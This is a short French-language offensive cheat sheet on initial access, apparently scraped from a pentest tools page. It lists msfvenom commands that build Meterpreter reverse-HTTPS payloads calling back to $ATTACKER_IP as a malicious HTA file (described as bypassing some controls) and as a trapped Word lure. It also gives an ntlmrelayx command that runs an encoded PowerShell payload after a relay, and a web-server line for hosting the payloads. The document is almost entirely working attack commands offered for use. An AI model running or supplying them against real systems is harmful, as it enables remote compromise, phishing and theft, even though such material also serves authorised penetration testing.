Copy command
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$ATTACKER_IP LPORT=443 -f hta-psh -o payload.htaDescription: Générer un HTA malveillant : exécution via mshta.exe, contourne certains contrôles.
Pre-Exploitation
Vecteurs d'accès initial : HTA, macros Office et combinaisons avec relay.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$ATTACKER_IP LPORT=443 -f hta-psh -o payload.htaDescription: Générer un HTA malveillant : exécution via mshta.exe, contourne certains contrôles.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$ATTACKER_IP LPORT=443 -f docx -o lure.docxDescription: Payload macro Word : accès initial classique via un document Office piégé.
ntlmrelayx.py -tf relay.txt --smb2support -c 'powershell -enc $BASE64_PAYLOAD'Description: Combiner relay avec exécution de payload post-relay.
python3 -m http.server 80Description: Héberger les payloads pour téléchargement via PowerShell ou curl.